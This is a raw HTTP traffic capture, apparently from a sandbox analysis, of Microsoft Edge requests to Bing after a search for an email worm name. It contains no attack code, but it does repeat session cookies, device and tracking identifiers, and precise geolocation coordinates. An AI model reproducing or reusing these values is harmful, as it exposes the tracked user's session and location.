cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df662
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023483%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df664
GET

https://www.bing.com/sa/54406577/Blue/BlueIdentityDropdownRedirect_c.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /sa/54406577/Blue/BlueIdentityDropdownRedirect_c.js HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67d0f3502b3b4db1be58e556900b09f8
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-wRo+YXNawdoyXeEgi2UQm1LqHhQk+Z5TWLa5uKJNzh0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: D87F284044484E6690FEF174B3829BB1 Ref B: LON04EDGE0817 Ref C: 2025-03-12T02:37:04Z
date: Wed, 12 Mar 2025 02:37:04 GMT
set-cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E; expires=Mon, 06-Apr-2026 02:37:04 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:04 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df661
GET

https://www.bing.com/Identity/Dropdown?n=1&IID=SERP.5069&IG=C6B6495D728647ADA3098FCFDAE1CBA9&ru=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3DEmail-Worm%252FScare.hta%26aqs%3Dedge..69i57j69i58.240747624j0j0%26FORM%3DANAB01%26PC%3DU531

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /Identity/Dropdown?n=1&IID=SERP.5069&IG=C6B6495D728647ADA3098FCFDAE1CBA9&ru=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3DEmail-Worm%252FScare.hta%26aqs%3Dedge..69i57j69i58.240747624j0j0%26FORM%3DANAB01%26PC%3DU531 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822

Response

HTTP/2.0 200

x-msedge-ref: Ref A: 3BF9D85E432440CF86B9AA50539C4230 Ref B: LON04EDGE1012 Ref C: 2025-03-12T02:37:04Z
date: Wed, 12 Mar 2025 02:37:04 GMT
content-length: 873
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df6a0
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1741747023532%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22769.4999999948777%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1741747023535%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221842.4999999988358%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1741747023536%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023581%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1741747023532%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22769.4999999948777%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1741747023535%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221842.4999999988358%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1741747023536%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023581%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df6a9
GET

https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /secure/Passport.aspx?popup=1&ssl=1 HTTP/2.0
host: www.bing.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: DIDC=ct%3D1741747024%26hashalg%3DSHA256%26bver%3D40%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C551_BAY.0.D.CofDCHSBbLJpLDFN53O1MU63kYcGGfmzxSsdLdVKf/4P8nGkee32vRDTay4uMvqELdSISVcKAVeySav33kjh70r3p26dAdtcIdRL2hrSvZaCTOd4yaB0g%252BnGLwSRRXetsp0k1I57raTGDEWpym4xnhZyZQ1SK7a26k3HX7RYZIKEZiP4s036XDBBHk32sZ0bk0w6jnS2Em/fItfsNNNDcoU0DhVoykf0PxkMGelMqo6ZbGxiJ7kJq9xz4sRTUpvmdJr27vmnr0ZFzFRiUpnYJ6CcUO%252BL5Vhfwkm7WhQj/kcdJQNgXTgrcQ8WaC/Cl7UiRMFKA9a27dBHt6Xgs4ovMdHq4IIIHYlrOTwyNUR2F6JhRDzRW/m04%252BvlELi9Sy/Bt2Sb2jvl7h0UzTHPpxmNQ1D6azQrK5lQ99PbJWnEgVjByL36g9J3BlArrt5rsNRUJFVOjVuF86PhncOuUaUdgz8JJ/a6CGYRWwW3nGlMYR338o1%252BnnZKHZ5vOXuuTXXihoJxp0yH81GF7rgJadoWXQRnz1NucAXXl3gcdcuHEBwt%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3D92wlPvvTdxOJ8FDVFdYE3YlZxvJq7nx0%26hash%3Dya1x9EkoKwrfRhwNuIdnY7eRGiu%252FFwOTXTiEfenzr%252Fo%253D%26dd%3D1
cookie: DIDCL=ct%3D1741747024%26hashalg%3DSHA256%26bver%3D40%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C551_BAY.0.D.CofDCHSBbLJpLDFN53O1MU63kYcGGfmzxSsdLdVKf/4P8nGkee32vRDTay4uMvqELdSISVcKAVeySav33kjh70r3p26dAdtcIdRL2hrSvZaCTOd4yaB0g%252BnGLwSRRXetsp0k1I57raTGDEWpym4xnhZyZQ1SK7a26k3HX7RYZIKEZiP4s036XDBBHk32sZ0bk0w6jnS2Em/fItfsNNNDcoU0DhVoykf0PxkMGelMqo6ZbGxiJ7kJq9xz4sRTUpvmdJr27vmnr0ZFzFRiUpnYJ6CcUO%252BL5Vhfwkm7WhQj/kcdJQNgXTgrcQ8WaC/Cl7UiRMFKA9a27dBHt6Xgs4ovMdHq4IIIHYlrOTwyNUR2F6JhRDzRW/m04%252BvlELi9Sy/Bt2Sb2jvl7h0UzTHPpxmNQ1D6azQrK5lQ99PbJWnEgVjByL36g9J3BlArrt5rsNRUJFVOjVuF86PhncOuUaUdgz8JJ/a6CGYRWwW3nGlMYR338o1%252BnnZKHZ5vOXuuTXXihoJxp0yH81GF7rgJadoWXQRnz1NucAXXl3gcdcuHEBwt%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3D92wlPvvTdxOJ8FDVFdYE3YlZxvJq7nx0%26hash%3Dya1x9EkoKwrfRhwNuIdnY7eRGiu%252FFwOTXTiEfenzr%252Fo%253D%26dd%3D1
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
